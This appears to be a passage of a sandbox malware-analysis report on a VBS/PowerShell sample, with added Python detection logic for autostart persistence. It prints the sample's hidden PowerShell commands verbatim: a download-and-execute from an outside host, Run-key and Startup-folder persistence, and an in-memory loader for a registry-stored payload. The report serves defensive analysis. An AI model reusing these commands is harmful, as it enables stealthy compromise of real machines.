Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Windows Shell Script Host drops VBS files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\nUleFczcAh.vbs
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs

Boot Survival:

barindex
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\microsoft = C:\Users\user\AppData\Roaming\microsoft.vbs
Creates multiple autostart registry keys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\microsoft
Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nUleFczcAh
Drops VBS files to the startup folder
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs (2 events)
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs
Stores files to the Windows start menu directory
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs
Creates an autostart registry key
Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nUleFczcAh (2 events)
Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nUleFczcAh (2 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\microsoft (2 events)
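The persistence pattern recorded above (Run values written by powershell.exe and wscript.exe that point at .vbs files under the user profile, plus .vbs drops into the Startup folder, with the same script registered in more than one autostart location) can be turned into host-side detection logic. The Python below is an added example, not code from the sandbox or from the sample. It runs over constructed Sysmon-style events (RegistrySet and FileCreate records) that mirror the report's paths; the value data of the nUleFczcAh Run entry and the benign "VendorUpdater" control are assumptions, since the report shows neither.

```python
"""Detection logic for script-based autostart persistence, as seen in this report.

Added example; the events below are constructed to mirror the report's paths and
are not sandbox output.  Input is a list of Sysmon-style events (registry value
set, file create).  Output is a list of findings, including a correlation rule
for a script that is registered in more than one autostart location.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Script file types that a Run value or Startup-folder entry rarely points at legitimately.
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd")
# Script hosts and shells that rarely have a legitimate reason to write Run values.
SCRIPT_HOSTS = ("powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe")

RUN_KEY_RE = re.compile(
    r"^(HKCU|HKLM|HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE|HKU\\[^\\]+)"
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\(?P<name>[^\\]+)$",
    re.IGNORECASE,
)
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+$", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(
    r"^[a-z]:\\Users\\[^\\]+\\|%(APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%", re.IGNORECASE
)


@dataclass
class Event:
    kind: str            # "RegistrySet" or "FileCreate"
    image: str           # process that performed the write
    target: str          # registry value path or created file path
    details: str = ""    # registry value data (unused for FileCreate)


@dataclass
class Finding:
    rule: str
    artifact: str                  # script or file path the finding is about
    event: Optional[Event] = None  # None for correlation findings


def basename_lower(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def extract_script_path(data: str) -> Optional[str]:
    """Return the first script path in Run-value data, handling quoted paths and a
    leading host such as 'wscript.exe "C:\\x.vbs"'."""
    for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', data):
        cand = quoted or bare
        if cand.lower().endswith(SCRIPT_EXT):
            return cand
    return None


def check_event(ev: Event) -> List[Finding]:
    """Per-event rules for the two autostart locations used by this sample."""
    out: List[Finding] = []
    if ev.kind == "RegistrySet" and RUN_KEY_RE.match(ev.target):
        script = extract_script_path(ev.details)
        subject = script or ev.details
        if basename_lower(ev.image) in SCRIPT_HOSTS:
            out.append(Finding("run_key_written_by_script_host", subject, ev))
        if script:
            out.append(Finding("run_key_points_to_script", script, ev))
        if USER_WRITABLE_RE.search(subject):
            out.append(Finding("run_key_points_to_user_writable_path", subject, ev))
    elif ev.kind == "FileCreate":
        if STARTUP_DIR_RE.search(ev.target) and ev.target.lower().endswith(SCRIPT_EXT):
            out.append(Finding("script_dropped_in_startup_folder", ev.target, ev))
    return out


def analyse(events: List[Event]) -> List[Finding]:
    """Run per-event rules, then flag scripts registered both as a Run value and as a
    Startup-folder drop (the 'multiple autostart' behaviour in the report)."""
    findings = [f for ev in events for f in check_event(ev)]
    rules_by_name = {}
    for f in findings:
        rules_by_name.setdefault(basename_lower(f.artifact), set()).add(f.rule)
    for name, rules in sorted(rules_by_name.items()):
        if {"run_key_points_to_script", "script_dropped_in_startup_folder"} <= rules:
            findings.append(Finding("multiple_autostart_for_same_script", name))
    return findings


# Constructed events mirroring the report's paths.  The value data of the
# nUleFczcAh entry is assumed; the report does not show it.
SAMPLE_EVENTS = [
    Event("RegistrySet", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\microsoft",
          r"C:\Users\user\AppData\Roaming\microsoft.vbs"),
    Event("FileCreate", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs"),
    Event("RegistrySet", r"C:\Windows\System32\wscript.exe",
          r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nUleFczcAh",
          r'wscript.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs"'),
    Event("FileCreate", r"C:\Windows\System32\wscript.exe",
          r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs"),
    # Benign control (assumed): an installer under Program Files registering its own updater.
    Event("RegistrySet", r"C:\Program Files\Vendor\setup.exe",
          r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
          r'"C:\Program Files\Vendor\updater.exe" /background'),
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f.rule:40s} {f.artifact}")
```

On the sample events this yields eight per-event findings for the four malicious records, none for the benign control, and two correlation findings (microsoft.vbs and nUleFczcAh.vbs each appear both as a Run value target and as a Startup-folder drop). The correlation is keyed on the script's file name rather than its full path because, as the report shows, the Run value and the dropped file need not live in the same directory.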

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
The monitored key is the machine root certificate store, not one of the Run keys written under Boot Survival. Windows' certificate store code registers for change notifications on the physical store keys whenever a process opens the store, and powershell.exe does this routinely, so this hit does not by itself show that the sample guards its persistence entries.
Disables application error messages (SetErrorMode)
NOOPENFILEERRORBOX is SEM_NOOPENFILEERRORBOX: it suppresses the dialog Windows would otherwise show when a file cannot be found and returns the error to the caller instead. mshta.exe, cmd.exe, wscript.exe and powershell.exe all set it here, as many Windows binaries do, so the signature is low-signal on its own.
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
